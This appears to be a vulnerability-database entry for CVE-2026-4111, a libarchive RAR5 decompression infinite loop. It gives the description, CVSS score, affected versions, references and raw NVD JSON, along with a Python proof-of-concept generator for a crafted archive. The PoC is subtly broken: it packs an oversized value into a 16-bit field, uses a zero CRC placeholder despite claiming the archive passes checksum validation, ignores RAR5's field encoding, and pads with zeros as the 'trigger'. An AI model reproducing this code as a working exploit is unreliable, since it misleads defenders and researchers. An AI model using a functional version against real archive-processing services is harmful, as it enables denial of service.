CVE-2026-4111

Description

A flaw was identified in the RAR5 archive decompression logic of the libarchive library, specifically within the archive_read_data() processing path. When a specially crafted RAR5 archive is processed, the decompression routine may enter a state where internal logic prevents forward progress. This condition results in an infinite loop that continuously consumes CPU resources. Because the archive passes checksum validation and appears structurally valid, affected applications cannot detect the issue before processing. This can allow attackers to cause persistent denial-of-service conditions in services that automatically process archives.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

libarchive < 3.7.4

libarchive < 3.6.3

libarchive < 3.5.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-4111 PoC - libarchive RAR5 Decompression Infinite Loop
This PoC generates a specially crafted RAR5 archive that triggers
an infinite loop in libarchive's archive_read_data() function.

Note: This is a proof-of-concept for educational purposes only.
"""

import struct
import os

def create_malformed_rar5():
    """
    Create a RAR5 archive with malformed compression data
    that triggers the infinite loop vulnerability in libarchive.
    """
    # RAR5 signature
    rar5_signature = b'RAR\xfb\x27\x1a\x07\x00'
    
    # Archive header block
    header_type = 0x01  # Archive header
    header_flags = 0x0002
    header_size = 0x3D
    header_crc = 0x00000000  # Placeholder
    
    # Archive info
    archive_info = struct.pack('<I', 5)  # Version
    archive_info += struct.pack('<I', 0)  # Volume number
    archive_info += struct.pack('<I', 0)  # Timestamp
    
    # File header block
    file_header = b'\x02'  # Header type: file header
    file_header += struct.pack('<H', 0x9000)  # Flags (packed file)
    file_header += struct.pack('<I', 0x40)  # Header size
    
    # File info
    file_info = struct.pack('<Q', 0)  # unpacked size
    file_info += struct.pack('<I', 0x30)  # attributes
    file_info += struct.pack('<I', 0)  # timestamp
    
    # File name
    file_name = b'trigger.txt\x00'
    file_info += struct.pack('<B', len(file_name))  # name length
    file_info += file_name
    
    # Malformed compression data that triggers infinite loop
    # This exploits the vulnerability in decompression state machine
    malicious_data = b'\x00' * 1024  # Padding to trigger condition
    
    # Construct the malicious archive
    archive = rar5_signature
    archive += struct.pack('<I', header_crc)
    archive += struct.pack('<H', header_type | (header_flags << 16))
    archive += struct.pack('<H', header_size)
    archive += archive_info
    archive += file_header
    archive += file_info
    archive += malicious_data
    
    return archive

def main():
    print("[*] Generating CVE-2026-4111 PoC RAR5 archive...")
    poc_data = create_malformed_rar5()
    
    output_file = "CVE-2026-4111-poc.rar"
    with open(output_file, 'wb') as f:
        f.write(poc_data)
    
    print(f"[+] PoC archive created: {output_file}")
    print(f"[+] File size: {len(poc_data)} bytes")
    print("\n[!] Usage: Process this file with vulnerable libarchive version")
    print("[!] Impact: CPU exhaustion due to infinite loop in decompression")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4111
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4111
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4111/
[4] VulDB https://vuldb.com/cve/CVE-2026-4111
[5] https://access.redhat.com/errata/RHSA-2026:10065
[6] https://access.redhat.com/errata/RHSA-2026:10081
[7] https://access.redhat.com/errata/RHSA-2026:10097
[8] https://access.redhat.com/errata/RHSA-2026:14773
[9] https://access.redhat.com/errata/RHSA-2026:15087
[10] https://access.redhat.com/errata/RHSA-2026:16008
[11] https://access.redhat.com/errata/RHSA-2026:16009
[12] https://access.redhat.com/errata/RHSA-2026:16174
[13] https://access.redhat.com/errata/RHSA-2026:17596
[14] https://access.redhat.com/errata/RHSA-2026:5063

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4111", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:13.917", "lastModified": "2026-05-20T17:16:26.510", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was identified in the RAR5 archive decompression logic of the libarchive library, specifically within the archive_read_data() processing path. When a specially crafted RAR5 archive is processed, the decompression routine may enter a state where internal logic prevents forward progress. This condition results in an infinite loop that continuously consumes CPU resources. Because the archive passes checksum validation and appears structurally valid, affected applications cannot detect the issue before processing. This can allow attackers to cause persistent denial-of-service conditions in services that automatically process archives."}, {"lang": "es", "value": "Se identificó una vulnerabilidad en la lógica de descompresión de archivos RAR5 de la biblioteca libarchive, específicamente dentro de la ruta de procesamiento de archive_read_data(). Cuando se procesa un archivo RAR5 especialmente manipulado, la rutina de descompresión puede entrar en un estado en el que la lógica interna impide el avance. Esta condición resulta en un bucle infinito que consume continuamente recursos de CPU. Debido a que el archivo pasa la validación de suma de verificación y parece estructuralmente válido, las aplicaciones afectadas no pueden detectar el problema antes del procesamiento. Esto puede permitir a los atacantes causar condiciones persistentes de denegación de servicio en servicios que procesan archivos automáticamente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-835"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:10065", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:10081", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:10097", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:14773", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:15087", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16008", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16009", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16174", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:17596", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:5063", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:5080", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:6647", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:7093", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:7105", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:7106", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:7239", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:7329", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:7335", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:8423", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:8746", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:8747", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:8748", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:8865", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:8944", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:9832", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-4111", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446453", "source": "[email protected]"}, {"url": "https://github.com/libarchive/libarchive/pull/2877", "source": "[email protected]"}]}}